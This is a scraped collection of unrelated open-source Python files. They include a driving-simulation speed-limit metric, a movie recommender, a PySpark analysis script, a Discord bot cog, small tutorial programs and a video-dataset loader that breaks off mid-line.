\"\"\"\n\n if self.history.map_api.is_in_layer(ego_state.center, SemanticMapLayer.LANE):\n layer = SemanticMapLayer.LANE\n elif self.history.map_api.is_in_layer(ego_state.center, SemanticMapLayer.INTERSECTION):\n layer = SemanticMapLayer.LANE_CONNECTOR\n else:\n return None\n\n segments: List[GraphEdgeMapObject] = self.history.map_api.get_all_map_objects(ego_state.center, layer)\n segment = segments[0]\n return RoadElementAndSpeedLimit(segment, segment.speed_limit_mps)\n\n def _get_speed_limit_with_prior(self, ego_state: EgoState) -> Optional[RoadElementAndSpeedLimit]:\n \"\"\"\n Gets the current lane or lane connector, along with its speed limit, using an initial guess of where ego is.\n :param ego_state: State of ego\n :returns: An object with the current map element and speed limit, None if none is found\n \"\"\"\n assert isinstance(self.last_element_and_speed_limit, RoadElementAndSpeedLimit)\n\n # If we are in the same lane or lane connector, nothing to do\n if self.last_element_and_speed_limit.road_element.contains_point(ego_state.center):\n return self.last_element_and_speed_limit\n\n # We check if the upcoming map elements contain the point\n segments = self.last_element_and_speed_limit.road_element.outgoing_edges()\n for segment in segments:\n if segment.contains_point(ego_state.center):\n return RoadElementAndSpeedLimit(segment, segment.speed_limit_mps)\n\n # If everything else fails we resort to compute from scratch\n return self._get_speed_limit_no_prior(ego_state)\n\n def _get_speed_limit_violation(self, ego_state: EgoState, timestamp: int) -> Optional[GenericViolation]:\n \"\"\"\n Computes by how much ego is exceeding the speed limit\n\n :param ego_state: The current state of Ego\n :param timestamp: The current timestamp\n :return: By how much ego is exceeding the speed limit, none if not violation is present or unable to find\n the speed limit.\n \"\"\"\n\n if self.last_element_and_speed_limit:\n self.last_element_and_speed_limit = self._get_speed_limit_with_prior(ego_state)\n else:\n self.last_element_and_speed_limit = self._get_speed_limit_no_prior(ego_state)\n\n if self.last_element_and_speed_limit is not None:\n exceeding_speed = ego_state.dynamic_car_state.speed - self.last_element_and_speed_limit.speed_limit_mps\n return GenericViolation(timestamp, violation_depths=[exceeding_speed]) if exceeding_speed > 0 else None\n\n return None\n\n\nclass SpeedLimitViolationStatistics(AbstractMetricBuilder):\n\n def __init__(self, name: str, category: str) -> None:\n \"\"\"\n Statistics on drivable area violations of ego.\n\n :param name: Metric name.\n :param category: Metric category.\n \"\"\"\n\n self._name = name\n self._category = category\n self._statistics_name = \"speed_limit_violation_statistics\"\n\n @property\n def name(self) -> str:\n \"\"\"\n Returns the metric name.\n :return: the metric name.\n \"\"\"\n\n return self._name\n\n @property\n def category(self) -> str:\n \"\"\"\n Returns the metric category.\n :return: the metric category.\n \"\"\"\n\n return self._category\n\n def compute(self, history: SimulationHistory) -> List[MetricStatistics]:\n \"\"\"\n Returns the estimated metric.\n :param history: History from a simulation engine.\n :return: the estimated metric.\n \"\"\"\n\n extractor = SpeedLimitViolationExtractor(history=history, metric_name=self._name, category=self._category,\n statistics_name=self._statistics_name)\n\n extractor.extract_metric()\n\n violation_statistics = aggregate_metric_violations(extractor.violations, self._name, self._category,\n self._statistics_name)\n\n return [violation_statistics]\n","repo_name":"mk-minchul/path_planning_with_attention","sub_path":"nuplan/planning/metrics/evaluation_metrics/common/speed_limit_violation.py","file_name":"speed_limit_violation.py","file_ext":"py","file_size_in_byte":8701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"4312657598","text":"# Jormungandr - Onboarding\nfrom ...domain.exceptions.exceptions import ErrorOnSendAuditLog\nfrom ...domain.enums.types import QueueTypes\nfrom ...domain.complementary_data.model import ComplementaryDataModel\n\n# Third party\nfrom decouple import config\nfrom etria_logger import Gladsheim\nfrom persephone_client import Persephone\n\n\nclass Audit:\n audit_client = Persephone\n\n @classmethod\n async def record_message_log(cls, complementary_data_model: ComplementaryDataModel):\n message = await complementary_data_model.get_audit_template()\n partition = QueueTypes.USER_COMPLEMENTARY_DATA\n topic = config(\"PERSEPHONE_TOPIC_USER\")\n schema_name = config(\"PERSEPHONE_COMPLEMENTARY_DATA_SCHEMA\")\n (\n success,\n status_sent_to_persephone,\n ) = await cls.audit_client.send_to_persephone(\n topic=topic,\n partition=partition,\n message=message,\n schema_name=schema_name,\n )\n if not success:\n Gladsheim.error(\n message=\"Audit::register_user_log::Error on trying to register log\"\n )\n raise ErrorOnSendAuditLog\n return True\n","repo_name":"sam-ve-m/onboarding.complementary_data","sub_path":"func/src/transports/audit/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1650197939","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\ndef area_of_circle (x):\n pi = 3.14\n return pi * x ** 2\n\ndef sum (start, end, func):\n total = 0\n for x in range(start, end):\n total += func(x)\n return total\ndef func1(n):\n return n\n\ndef func2(n):\n return n ** 2 + 1\n\nprint(area_of_circle(3))\nprint(sum(1, 100, func1))\nprint(sum(1, 100, func2))\n\nprint(abs(-100)) # 绝对值\nprint(max(99, 45, 54)) #返回最大值\nprint(int('1'))\nprint(float('1.32'))\nprint(str(1.32))\nprint(bool(1.32))\n\n# 空函数\ndef function():\n pass\n\n# def my_abs(x):\n# if x >= 0:\n# return x\n# else:\n# return -x\n# 两者错误不同\n# print(my_abs('A'))\n# print(abs('A'))\n\ndef my_abs(x):\n if not isinstance(x,(int, float)):\n raise TypeError('bad operand type')\n if x >= 0:\n return x\n else:\n return -x\n\n# print(my_abs('A'))\n# print(abs('A'))\n\nimport math\n\ndef move(x, y, step, angle = 0):\n nx = x + step * math.cos(angle)\n ny = y + step * math.sin(angle)\n return nx, ny\nx, y = move(100, 100, math.pi/6, 90)\nr = move(100, 100, math.pi/6, 90)\n# 返回多个值,其实是一个tuple\nprint(x, y)\nprint(r)","repo_name":"Htgs/pypypypy","sub_path":"lxf-8函数.py","file_name":"lxf-8函数.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20197473445","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.sparse import csr_matrix\n\nfrom recommender import Recommender\n\n\nclass KNNRecommender(Recommender):\n def __init__(self):\n # Data pre-processing\n self.movies = pd.read_csv(\"datasets/ml-latest-small/movies.csv\") \\\n .drop(\"genres\", axis=1)\n self.ratings = pd.read_csv(\"datasets/ml-latest-small/ratings.csv\") \\\n .drop(\"timestamp\", axis=1)\n\n pivot_table = self.ratings.pivot(index=\"movieId\", columns=\"userId\", values=\"rating\") \\\n .fillna(0)\n self.sparse_matrix = csr_matrix(pivot_table.values)\n\n # Model training\n self.model = NearestNeighbors(metric=\"cosine\", algorithm=\"brute\", n_neighbors=20) \\\n .fit(self.sparse_matrix)\n \n \n def recommend(self, ratings):\n recommendations = set()\n recommended_movies = []\n\n liked_movies = [movieId for movieId in ratings if ratings[movieId] > 3]\n\n for movie_id in liked_movies:\n if movie_id > self.movies['movieId'].unique().size:\n continue\n _, ids = self.model.kneighbors(self.sparse_matrix[movie_id], n_neighbors=5)\n recommendations.update(*(set(rec_id for rec_id in x if rec_id not in ratings) for x in ids))\n \n for movie_id in recommendations:\n temp = self.movies.loc[self.movies['movieId'] == movie_id, 'title']\n if not temp.empty:\n recommended_movies.append(temp.item())\n\n return recommended_movies, recommendations\n\n \n def getAccuracy(self):\n # for each user, get random sampling of movies and ratings\n # get recommendations based on random sampling\n # find user's average rating for the returned movies\n for user in self.ratings['userId'].unique():\n user_ratings = self.ratings.loc[self.ratings['userId'] == user].drop('userId', axis = 1)\n user_ratings = user_ratings.sample(n=5)\n\n user_dict = {}\n for _, row in user_ratings.iterrows():\n if(row['movieId'] >= 9724):\n continue\n user_dict[row['movieId']] = row['rating']\n \n _, recommendations = self.recommend(user_dict)\n \n total = 0\n for rec in recommendations:\n temp = (user_ratings.loc[user_ratings['movieId'] == rec, 'rating'])\n if temp.size != 0:\n total += temp[0]\n \n avg_rating = 0 if len(recommendations) == 0 else total/len(recommendations)\n\n if(avg_rating != 0):\n print(\"Average rating for user \" + str(user) + \": \" + str(avg_rating))\n\n\n# knn_rec1 = KNNRecommender()\n# knn_rec1.getAccuracy()\n# print(knn_rec1.sparse_matrix.shape)\n# print(knn_rec1.ratings['movieId'].unique().size)","repo_name":"bryantpark04/cds-freshman-project","sub_path":"knn_recommender.py","file_name":"knn_recommender.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"2171258890","text":"#!/usr/bin/env python3\r\n\r\n# display a welcome message\r\nprint(\"The Miles Per Gallon program\")\r\n\r\n\r\ncont = True\r\n\r\nwhile cont:\r\n print()\r\n # get input from the user\r\n miles_driven = float(input(\"Enter miles driven: \"))\r\n gallons_used = float(input(\"Enter gallons of gas used: \"))\r\n cost_gallons = float(input(\"Enter cost per gallon: \"))\r\n\r\n while miles_driven <= 0:\r\n print()\r\n miles_driven = float(input(\"Miles driven must be greater than zero. Please try again: \"))\r\n while gallons_used <= 0:\r\n print()\r\n gallons_used = float(input(\"Gallons used must be greater than zero. Please try again: \"))\r\n while gallons_used <= 0:\r\n print()\r\n cost_gallons = float(input(\"Cost per gallon used must be greater than zero. Please try again: \"))\r\n\r\n # calculate and display miles per gallon\r\n print()\r\n mpg = round(miles_driven / gallons_used, 2)\r\n print(\"Miles Per Gallon: \", mpg)\r\n total_cost = round(gallons_used * cost_gallons, 2)\r\n print(\"Total Gas Cost: \", total_cost)\r\n cost_mile = round(cost_gallons / mpg, 2)\r\n print(\"Cost Per Mile: \", cost_mile)\r\n\r\n answer = str(input(\"Get entries for another trip (y/n)? \"))\r\n while answer != \"y\" and answer != \"n\":\r\n print()\r\n print(\"Invalid Selection! Chose again\")\r\n answer = str(input(\"Get entries for another trip (y/n)? \"))\r\n if answer == \"n\":\r\n cont = False\r\n\r\n\r\n\r\n\r\n","repo_name":"CWance/Murach","sub_path":"Python/pyt2_allfiles/exercises/ch03/mpg.py","file_name":"mpg.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"347737479","text":"import curseforge\nimport modrinth\nimport util\nfrom variables import *\n\n\ndef getModFile(modName):\n fileName, downloadUrl = curseforge.getModFile(modName)\n if fileName != None and downloadUrl != None:\n return fileName, downloadUrl\n\n util.log(modName + \" not found on curseforge, trying modrinth\")\n\n fileName, downloadUrl = modrinth.getModFile(modName)\n if fileName != None and downloadUrl != None:\n return fileName, downloadUrl\n\n util.log(modName + \" not found on curseforge or modrinth\")\n return None, None\n\n\ndef main():\n util.eraseFile(LOG_FILE)\n\n # backup mods\n modFolder = util.getFromConfig(\"modFolder\")\n util.moveFiles(modFolder, modFolder + \"backup/\")\n\n # download all mods\n for modName in util.getFromConfig(\"mods\"):\n fileName, downloadUrl = getModFile(modName)\n if fileName is None or downloadUrl is None:\n continue\n\n util.downloadFile(downloadUrl, \"mods/\" + fileName)\n\n # copy mods to mods folder\n util.copyFiles(\"mods/\", modFolder)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nrobinson12/mc-mod-downloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13314925639","text":"from tkinter import *\nfrom functools import partial\nimport random\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\n\nclass Start:\n\n def __init__(self,parent):\n\n self.o_start_frame = Frame(padx=10,bg=\"#D4E6F1\")\n self.o_start_frame.grid()\n\nclass Play:\n def __init__(self, parent):\n\n \n self.start_frame = Frame(padx=10,bg=\"#D4E6F1\")\n self.start_frame.grid()\n\n self.starting_funds = IntVar()\n\n self.mystery_box_label = Label(self.start_frame, text=\"Play...\",font=\"times 18 bold underline\",pady=20, padx=10,bg=\"#D4E6F1\")\n self.mystery_box_label.grid(row=1)\n\n self.instruction_start = Label(self.start_frame , text=\"Press Enter or click the 'Open Boxes' button to reveal the contents of the mystery boxes\",bg=\"#D4E6F1\",font=\"times 11\", justify=LEFT, wrap=250)\n self.instruction_start.grid(row=2,pady=5)\n\n self.funds_frame = Frame(self.start_frame, width=45, bg=\"#D4E6F1\")\n self.funds_frame.grid(row=5)\n\n self.amount_start = Label(self.funds_frame , text=\"Welcome, your starting balance is {}\",bg=\"#D4E6F1\",font=\"times 12 bold\", justify=LEFT)\n self.amount_start.grid(row=0,pady=5)\n\n self.button_frame = Frame(self.start_frame, width=45, bg=\"#D4E6F1\")\n self.button_frame.grid(row=6,pady=10)\n\n self.instruction = Button(self.button_frame, text=\"How to play\",font=\"times 12 bold\")\n self.instruction.grid(row=1, column=1,pady=20)\n\n self.stats = Button(self.button_frame, text=\"Game Stats...\",font=\"times 12 bold\")\n self.stats.grid(row=1, column=2,pady=20)\n\n self.add_funds = Button(self.start_frame , width=15, text=\"Open Boxes\",font=\"times 16 bold\")\n self.add_funds.grid(row=4,column=0,pady=10)\n\n\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Mystery Box Game\")\n something = Start(root)\n root.mainloop()","repo_name":"kuschelyoungl71929/02_Mystery_Box_es","sub_path":"play_gui_v1.py","file_name":"play_gui_v1.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"16352035131","text":"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructField, StructType, StringType, LongType\nfrom dataframeOperations import FlightOperations\nfrom dataframeOperations import BikeOperations\nfrom util.df_logger import get_logger\n\nif __name__ == \"__main__\":\n try:\n logger = get_logger(__name__)\n\n spark = SparkSession.builder.appName(\"DataframeOperations\").getOrCreate()\n if spark:\n logger.info(\"Spark session has created\")\n manualSchema = StructType([StructField(\"DEST_COUNTRY_NAME\", StringType(), True),\n StructField(\"ORIGIN_COUNTRY_NAME\", StringType(), True),\n StructField(\"count\", LongType(), False, metadata={\"hello\": \"world\"})])\n flightoperations = FlightOperations(\n spark, \"E:\\\\Spark\\\\Working\\\\data\\\\flight-data\\\\json\", manualSchema)\n bike_operations = BikeOperations(spark, \"E:\\\\Spark\\\\Working\\\\data\\\\bike-data\")\n\n # Convert Spark DF into python list\n origin_country = 'india'.title()\n destination_df = flightoperations.get_destinations(origin_country)\n if len(destination_df.head(1)) > 0:\n dest_list = [dest.DEST_COUNTRY_NAME for dest in destination_df.collect()]\n logger.info(f\"Extracted the filghts available from {origin_country}\")\n logger.info(dest_list)\n else:\n logger.warn(\"No flight is available from \" + origin_country)\n\n # Save Spark DF into a JSON file\n logger.info(\"Checking flights to India...\")\n origin_df = flightoperations.get_origins('india'.title())\n if len(origin_df.head(1)) > 0:\n logger.info(\"Writing the output file to E:\\\\Spark\\\\project1\\\\origin.json\")\n origin_df.repartition(1).write.format('json').save(\n \"E:\\\\Spark\\\\project1\\\\origin.json\", mode=\"Overwrite\")\n else:\n logger.warn(\"No flight has found\")\n\n # Convert Spark DF into python int\n logger.info(\"Checking total number of countries which have flights to India...\")\n logger.info(flightoperations.get_flight_origin_count('India'))\n\n # To get aggregated sum of the result\n logger.info(\n f\"Checking total number of flights between {'united states'.title()} and {'australia'.title()}\")\n result = flightoperations.get_no_of_flights(\n 'united states'.title(), 'australia'.title())\n if result:\n logger.info(result)\n else:\n logger.warn(\"No flight service\")\n\n # Fetch the busiest start terminal\n logger.info(\"Checking for the most busiest journey begin place\")\n busy_st_df = bike_operations.get_busiest_start_terminal()\n logger.info(busy_st_df.take(1))\n\n # Fetch the busiest end terminal\n logger.info(\"Checking for the most busiest journey end place\")\n busy_end_df = bike_operations.get_busiest_end_terminal()\n logger.info(busy_end_df.take(1))\n\n # Get number of trips between start and end locations\n no_trips = bike_operations.get_no_trips(\"Harry Bridges Plaza (Ferry Building)\",\n \"San Francisco Caltrain (Townsend at 4th)\")\n logger.info(\n f\"Total number of trips between Harry Bridges Plaza (Ferry Building) and San Francisco Caltrain (Townsend at 4th) is {no_trips}\")\n\n # Get total number of available bikes\n no_bikes = bike_operations.get_no_bikes()\n logger.info(f\"Total of number of bikes available is {no_bikes}\")\n\n # Predict the number of trips in a day\n predicted_count = bike_operations.predict_no_trips(\"FRIDAY\")\n logger.info(f\"Predicted trips count for Friday is {predicted_count}\")\n\n # Calculate fare for a trips\n fare = bike_operations.get_fare_by_time(913459)\n logger.info(f\"Calculated fare for the trip id:913459 is {fare}\")\n\n # Estimate fare between places\n fare = bike_operations.get_fare_by_distance(\n \"San Antonio Shopping Center\", \"Paseo de San Antonio\")\n logger.info(\n f\"Estimated fare between San Antonio Shopping Center and Paseo de San Antonio is {fare}\")\n\n # Update the station details in a table\n bike_operations.store_station_details(\"station_details\")\n\n except Exception as error:\n logger.exception(f\"Something went wrong here {error}\")\n else:\n logger.info(\"Dataframe operations have completed\")\n finally:\n spark.stop()\n","repo_name":"SathishRM/Pyspark","sub_path":"DataframeOperations/src/dataframeClient.py","file_name":"dataframeClient.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"42688003995","text":"import discord\nimport logging\nimport random\nfrom discord import Game\nfrom discord.ext import commands\nfrom tamago import VERSION\nfrom tamago.lib import utils\n\nLOG = logging.getLogger(__name__)\n\nclass Server(commands.Cog):\n def __init__(self, tamago):\n self.tamago = tamago\n\n async def on_ready(self):\n await self.tamago.change_presence(status=discord.Status.idle, activity=Game(name='Waking up, making coffee...'))\n LOG.info('Logged in as {}'.format(self.tamago.user.name))\n self.tamago.loop.create_task(utils.change_status(self.tamago))\n self.tamago.loop.create_task(utils.list_servers(self.tamago))\n\n async def on_command_error(self, ctx, error):\n if isinstance(error, commands.CommandInvokeError):\n LOG.error(error)\n msg = '{} Error running the command'.format(ctx.message.author.mention)\n if isinstance(error, commands.CommandNotFound):\n msg = '{} the command you ran does not exist please use !help for assistance'.format(ctx.message.author.mention)\n if isinstance(error, commands.CheckFailure):\n msg = ':octagonal_sign: you do not have permission to run this command, {}'.format(ctx.message.author.mention)\n if isinstance(error, commands.MissingRequiredArgument):\n msg = 'Missing required argument: ```{}```'.format(error)\n\n if not msg:\n msg = 'Oh no, I have no idea what I am doing! {}'.format(error)\n\n\n await ctx.send('{}'.format(msg))\n\n @commands.command()\n async def tamago(self, ctx):\n embed = discord.Embed(\n title = 'Tamago Bot',\n description = 'Tamago Bot information',\n colour = discord.Colour.gold()\n )\n\n tamago_avatar = [\n 'https://i.imgur.com/NtDueT7.png',\n 'https://i.imgur.com/pzwv3Gs.png',\n 'https://i.imgur.com/khPDnT2.png',\n 'https://i.imgur.com/GEJjUD3.png',\n 'https://i.imgur.com/e4EyhfI.png',\n ]\n\n embed.set_author(name='Benidct Tamago')\n embed.set_thumbnail(url=random.choice(tamago_avatar))\n embed.add_field(name='description', value=f'Tamago is a WIP, add Tamago to your server! [add me]( https://discordapp.com/oauth2/authorize?client_id={self.tamago.app_id}&scope=bot)', inline=True)\n embed.add_field(name='Version', value=VERSION, inline=True)\n\n await ctx.send(embed=embed)\n\ndef setup(tamago):\n tamago.add_cog(Server(tamago))\n","repo_name":"hhollenstain/tamago","sub_path":"tamago/lib/plugins/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"37176710479","text":"import streamlit as st\n\nfrom tickers.download.config import set_yf_period\n\n\ndef download_button(scope):\n\n\tdownload_button_msg = 'Download Prior ' + str(int(scope.download['days'])) + ' day'\n\n\tif scope.download['days'] > 1: \n\t\tdownload_button_msg += 's'\n\n\treturn st.button(download_button_msg)\n\n\t\ndef edit_download_days(scope):\n\n\tprevious_selection = int(scope.download['days'])\n\tdisplay_name = 'Days to Download (recent)'\n\twidget_key = 'widget_download_days'\n\n\tst.sidebar.number_input( \t\n\t\t\t\t\t\t\tlabel\t\t=display_name, \n\t\t\t\t\t\t\tmin_value\t=7, \n\t\t\t\t\t\t\tvalue\t\t=previous_selection,\n\t\t\t\t\t\t\ton_change\t=on_change_download_days,\n\t\t\t\t\t\t\targs\t\t=(scope, widget_key, ),\n\t\t\t\t\t\t\tkey\t\t\t=widget_key,\n\t\t\t\t\t\t\t) \n\n\ndef on_change_download_days(scope:dict, widget_key:str):\n\n\tchanged_value = scope[widget_key]\n\n\t# store the selection\n\tscope.download['days'] = changed_value\n\n\t# update the yf download days\n\tset_yf_period(scope)\n\n","repo_name":"RobHay67/share_screener","sub_path":"widgets/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31754307930","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef main(filename):\n data = pd.read_csv(filename, header=None)\n means = data.mean(axis = 0)\n stds = data.std(axis = 0)\n return means[0], means[1], stds[0], stds[1]\n\nif __name__ == '__main__':\n files_http1 = ['./results/benchmark_size/http1_num_1_txt3.csv', './results/benchmark_size/http1_num_5_txt3.csv', './results/benchmark_size/http1_num_25_txt3.csv', './results/benchmark_size/http1_num_50_txt3.csv', './results/benchmark_size/http1_num_100_txt3.csv', './results/benchmark_size/http1_num_500_txt3.csv']\n files_http2 = ['./results/benchmark_size/http2_num_1_txt3.csv', './results/benchmark_size/http2_num_5_txt3.csv', './results/benchmark_size/http2_num_25_txt3.csv', './results/benchmark_size/http2_num_50_txt3.csv', './results/benchmark_size/http2_num_100_txt3.csv', './results/benchmark_size/http2_num_500_txt3.csv']\n\n time_tot_http2, time_contentTransfer_http2 = [], []\n std_tot_http2, std_contentTransfer_http2 = [], []\n \n time_tot_http1, time_contentTransfer_http1 = [], []\n std_tot_http1, std_contentTransfer_http1 = [], []\n\n for f in files_http2:\n t1, t2, std1, std2 = main(f)\n # time_contentTransfer_http2.append(t1)\n time_tot_http2.append(t2)\n\n # std_contentTransfer_http2.append(2*std1)\n std_tot_http2.append(2*std2)\n\n for f in files_http1:\n t1, t2, std1, std2 = main(f)\n # time_contentTransfer_http1.append(t1)\n time_tot_http1.append(t2)\n\n # std_contentTransfer_http1.append(2*std1)\n std_tot_http1.append(2*std2)\n\n x = [1, 5, 25, 50, 100, 500]\n time_tot_http2 = np.array(time_tot_http2)\n std_tot_http2 = np.array(std_tot_http2)\n time_tot_http1 = np.array(time_tot_http1)\n std_tot_http1 = np.array(std_tot_http1)\n\n fig, ax = plt.subplots() \n ax.grid()\n ax.plot(x, time_tot_http1, 'o-', color='r', label=\"HTTP1\")\n ax.plot(x, time_tot_http2, 'o-', color='g', label=\"SPDY\")\n\n ax.fill_between(x, time_tot_http1 - std_tot_http1, time_tot_http1 + std_tot_http1, color='gray', alpha=0.3)\n ax.fill_between(x, time_tot_http2 - std_tot_http2, time_tot_http2 + std_tot_http2, color='gray', alpha=0.3)\n # ax.errorbar(x, time_tot_http2, yerr=std_tot_http2, fmt='-', color='r', label=\"HTTP2\")\n # ax.errorbar(x, time_tot_quic, yerr=std_tot_quic, fmt='-', color='b', label=\"QUIC\")\n ax.set_xlabel('Number of times data sent')\n ax.set_ylabel('Time (in ms)')\n ax.legend()\n # ax.set_xscale('log')\n ax.set_title('Comparison of Total Time with Multiple Transfer')\n fig.savefig('results/plots/total_time_multi_data_transfer.png', dpi=fig.dpi)","repo_name":"khushhallchandra/CN-project","sub_path":"analyze_n_transfer.py","file_name":"analyze_n_transfer.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73674399516","text":"from .pages.main_page import MainPage\nfrom .pages.search_page import SearchPage\n\n\ndef test_MainPage_has_cur_date_link(driver, app_root_url):\n ''' Checks if MainPage has current date link '''\n main_page = MainPage(driver, app_root_url)\n main_page.open()\n\n assert main_page.has_cur_date_link(), 'Current date link is not present'\n\n\ndef test_user_can_go_to_SearchPage(driver, app_root_url):\n ''' Checks if user can go from MainPage to SearchPage '''\n main_page = MainPage(driver, app_root_url)\n main_page.open()\n\n main_page.to_search_page()\n search_page = SearchPage(driver, driver.current_url)\n\n assert search_page.url == f'{app_root_url}/search/', \"Link doesn't lead to SearchPage\"\n","repo_name":"dreamer20/pc_status","sub_path":"tests/e2e/test_MainPage.py","file_name":"test_MainPage.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27446028217","text":"import os\nimport glob\nimport torch\nimport pandas as pd\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport torchaudio.transforms as audio_transforms\nfrom torch.utils.data import Dataset\nfrom torchvision.io import read_video\nfrom transformers import CLIPProcessor, CLIPModel\nimport re\n\n\ndef split_camel_case(s):\n return re.sub(r'(?<=[a-z])(?=[A-Z])', ' ', s)\n\n# def prepare_labels(class_file):\n# with open(class_file, 'r') as f:\n# class_labels = [line.strip() for line in f.readlines()]\n\n# return {int(label.split()[0]): f\"a video of {split_camel_case(' '.join(label.split()[1:]))}\" for label in class_labels}\n\nclass BaseCLIPModel:\n def __init__(self, model_name='openai/clip-vit-base-patch32'):\n self.processor = CLIPProcessor.from_pretrained(model_name)\n self.model = CLIPModel.from_pretrained(model_name)\n self.model = self.model.eval()\n\nclass ThumosDataset(Dataset):\n def __init__(self, root_dir, split='train', transform=None, audio_transform=None, model_name='openai/clip-vit-base-patch32', downsample_factor=16):\n assert split in ['train', 'val', 'test'], \"split must be 'train', 'val', or 'test'\" \n self.processor = CLIPProcessor.from_pretrained(model_name) \n self.root_dir = root_dir\n self.split = split\n self.transform = transform\n self.audio_transform = audio_transform\n \n # self.video_files = sorted(glob.glob(os.path.join(root_dir, split, ext)))\n self.data = pd.read_csv(f\"{root_dir}/{split}/thumos_{split}.csv\")\n self.downsample = downsample_factor\n \n # class_labels_file = os.path.join(root_dir, 'classes.txt')\n # self.class_file = prepare_labels(class_labels_file)\n \n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n # Load video frames and audio\n video_path = self.data.loc[idx, 'video_path']\n label = self.data.loc[idx, 'label']\n if self.split in [\"test\", \"val\"]:\n start_action = self.data.loc[idx, 'start_action']\n end_action = self.data.loc[idx, 'end_action']\n else:\n start_action = [0]\n end_action = [0]\n video_frames, audio_waveform, framerate = read_video(video_path, pts_unit='sec', output_format=\"TCHW\")\n frame_rate = framerate[\"video_fps\"]\n audio_fps = framerate[\"audio_fps\"]\n video_frames = video_frames[::self.downsample, :, :, :]\n \n \n # # Preprocess video frames\n # if self.transform:\n # video_frames = torch.stack([self.transform(frame) for frame in video_frames])\n\n # Preprocess audio\n if audio_waveform.size(1) == 0:\n # Create an empty waveform with desired shape, e.g., (1, 1)\n audio_waveform = torch.zeros(2, 100000)\n # else:\n # # audio_waveform = self.audio_transform(audio_waveform)\n # audio_waveform = audio_transforms.SlidingWindow(duration=3, overlap=1)(audio_waveform)\n # print(audio_waveform.shape)\n \n\n # Load temporal labels\n start_action = start_action.strip(\"[]\").split()\n end_action = end_action.strip(\"[]\").split()\n start_action = [float(n) for n in start_action]\n end_action = [float(n) for n in end_action]\n start_action = torch.tensor(start_action, dtype=torch.float)\n end_action = torch.tensor(end_action, dtype=torch.float)\n \n # frame_rate = frame_rate / self.downsample # Adjust the frame rate according to the downsampled video frames\n # start_frame_indices = (start_action * frame_rate).round().long()\n # end_frame_indices = (end_action * frame_rate).round().long()\n \n\n # Get text embeddings\n # prompt = get_text_embedding(self.class_file[label], self.processor)\n video_frames = get_image_embedding(video_frames, self.processor)\n label = torch.tensor(label).long()\n return video_path, video_frames, audio_waveform, (start_action, end_action, label)\n \ndef collate_fn(batch):\n # Sort the batch in the descending order\n sorted_batch = sorted(batch, key=lambda x: x[1].shape[1], reverse=True)\n\n # Separate video frames, audio, and ground truths\n video_path, sequences, audios, ground_truths = zip(*sorted_batch)\n\n # Get sequence lengths\n lengths = [len(seq) for seq in sequences]\n # prompts = [p.squeeze() for p in prompts]\n\n # Padding\n padded_sequences = torch.nn.utils.rnn.pad_sequence([seq for seq in sequences], batch_first=True)\n # padded_audios = pad_audio(audios)\n\n # Unzip the ground truths\n start_frame_indices, end_frame_indices, action_classes = zip(*ground_truths)\n \n start_frame_indices = torch.nn.utils.rnn.pad_sequence(start_frame_indices, batch_first=True, padding_value=0)\n end_frame_indices = torch.nn.utils.rnn.pad_sequence(end_frame_indices, batch_first=True, padding_value=0)\n # max_length = max([prompt.size(1) for prompt in prompts])\n # prompts = torch.nn.utils.rnn.pad_sequence([torch.cat([prompt, torch.zeros((1, max_length - prompt.size(1)))], dim=1) for prompt in prompts], batch_first=True)\n # prompts = prompts.long()\n action_classes = torch.stack(action_classes)\n\n # Convert to tensors\n # start_frame_indices = torch.stack(start_frame_indices)\n # end_frame_indices = torch.stack(end_frame_indices)\n # action_classes = torch.stack(action_classes)\n\n return video_path, padded_sequences, None, (start_frame_indices, end_frame_indices, action_classes)\n\n\ndef get_thumos_dataloader(root_dir, split='train', batch_size=1, num_workers=1, downsample=16):\n transform = transforms.Compose([\n transforms.Resize((224, 224), antialias=True),\n transforms.ConvertImageDtype(torch.float32),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n audio_transform = audio_transforms.MelSpectrogram(sample_rate=16000, n_mels=64, n_fft=800) \n thumos_dataset = ThumosDataset(root_dir, split=split, transform=transform, audio_transform=audio_transform, downsample_factor=downsample)\n dataloader = torch.utils.data.DataLoader(thumos_dataset, 